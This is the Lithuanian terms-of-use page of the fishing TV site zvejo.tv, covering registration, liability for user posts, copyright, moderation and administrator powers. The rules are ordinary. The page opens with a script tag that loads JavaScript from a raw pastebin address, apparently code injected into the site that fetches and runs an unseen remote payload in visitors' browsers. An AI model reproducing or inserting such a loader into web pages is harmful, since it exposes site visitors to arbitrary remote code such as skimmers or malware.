<script type="text/javascript" src="https://pastebin.com/raw/f4YhqYKB"></script>

Taisyklės

1. Internetinė svetainė www.zvejo.tv yra prieinama visiems lankytojams, tačiau tik registruoti nariai turi teisę talpinti rašytinę ar kitokią informaciją bei naudotis svetainės jiems teikiamomis paslaugomis.
2. Registracija svetainėje www.zvejo.tv yra nemokama ir savanoriška!
3. Užsiregistruodami Jūs įsipareigojate laikytis šių Taisyklių. Prieš registruodamiesi, įdėmiai perskaitykite Taisykles.
4. zvejo.tv nekontroliuoja Jūsų paskelbtos informacijos turinio teisingumo ir jos šaltinio ir už ją neatsako. Tačiau mes pasiliekame teisę Jūsų paskelbtą informaciją pašalinti iš svetainės, jeigu ši informacija prieštarauja šioms Taisyklėms arba Lietuvos Respublikos įstatymams.
5. Svetainėje www.zvejo.tv gali būti patalpinta informacija, apsaugota intelektinės nuosavybės teisėmis. Jūs neturite teisės šio Turinio (ar kurios nors jo dalies) keisti, nuomoti, skolinti, suteikti panaudai, parduoti, platinti ar jo pagrindu kurti išvestinius darbus, išskyrus atvejus, kai Jums šią teisę atskiru susitarimu suteikia zvejo.tv.
6. Nekreipkite dėmesio į provokuojančius pasisakymus. Neerzinkite jų autorių ir neatsakykite jiems tuo pačiu, net jei manote, kad Jus įžeidė - dėmesio stoka savaime slopina audringą diskusiją. Visa kita - jau  administratoriaus darbas.
7. Tvarką komentaruose prižiūri administratorius. Jis gali redaguoti, šalinti žinutes, uždaryti/trinti/perkelti temas.
8. Svetainėje netoleruojamas dvigubų vartotojo vardų turėjimas.
9. Apie svetainę ir jos rėmėjus svetainėje rašyti galima tik gerai arba nieko :)
10.1 Administratorius neprivalo atsakyti į visus atsiųstus laiškus. Pvz.: į klausimus, kurių atsakymai išdėstyti mūsų laidose arba šiose taisyklėse.
10.2. Aiškinti priežastis, kodėl atliko vienokius ar kitokius veiksmus.
10.3. Jei Adminstratoriui elektroniniu paštu atsiųstas laiškas yra grubaus tono, pilnas necenzūrinių išsireiškimų - problema visai nenagrinėjama, o laiško autoriui draudžiama komentuoti laidas arba visiškai uždrausta naudotis svetaine. Jei pastebėsite draudžiamą informaciją zvejo.tv svetainėje, prašome nedelsiant informuoti apie tai Adminstratorių el.paštu: zvejotv@gmail.com
11. Šios taisyklės įsigalioja nuo Jūsų registracijos www.zvejo.tv svetainėje momento ir galioja visą laikotarpį, kol Jūs naudojatės jos paslaugomis.
Administracija pasilieka teisę periodiškai keisti/papildyti/tobulinti taisykles.